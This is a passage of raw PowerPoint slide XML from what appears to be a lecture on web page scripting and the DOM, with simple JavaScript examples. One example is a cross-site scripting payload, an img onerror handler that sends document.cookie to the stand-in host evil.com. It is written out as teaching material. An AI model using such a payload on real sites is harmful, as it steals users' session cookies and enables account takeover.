              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42DA7458-9550-2247-A411-52C2731A4401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351963" y="7505700"/>
            <a:ext cx="554037" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137241" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15DBE2F4-095B-B744-9FCC-901757A64AB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="806450"/>
            <a:ext cx="8537575" cy="6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lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When creating a script (in-line in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> displays an alert message by using the alert() function from the window object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pP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&lt;body  onload="</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window.alert</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(’welcome  to  my  page!’);"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> displays all the cookies associated with the current document in an alert message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pP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&lt;body  onload="</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window.alert</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document.cookie</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);"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sends all the cookies associated with the current document to the </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evil.com</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>server if </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x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>points to a non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>existant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> image</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pP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&lt;</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img</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  </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src</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=x  </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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>onerror=this.src=’http://evil.com/?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pP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c=’+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-12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254159-0CFF-B149-9DF2-9857DB72B433}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763588" y="1644650"/>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39267" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DBCB1B4-541B-164F-A9A6-0AFFE482B3DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1593850"/>
            <a:ext cx="7670800" cy="863600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9525" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rather than static or dynamic HTML, web pages  can be a program written in Javascript:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139268" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F506F9-5FCE-8D49-9509-E7C3B9F96F49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1944688" y="3059113"/>
            <a:ext cx="6169025" cy="1619250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="982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34230" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="482600" indent="-4508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00"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;b&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;  var b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1925"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“world: “</a:t>
            </a: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a+b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&lt;/b&gt;”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C840FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139269" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8450D99E-C011-FA45-ACC4-49F768E85BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
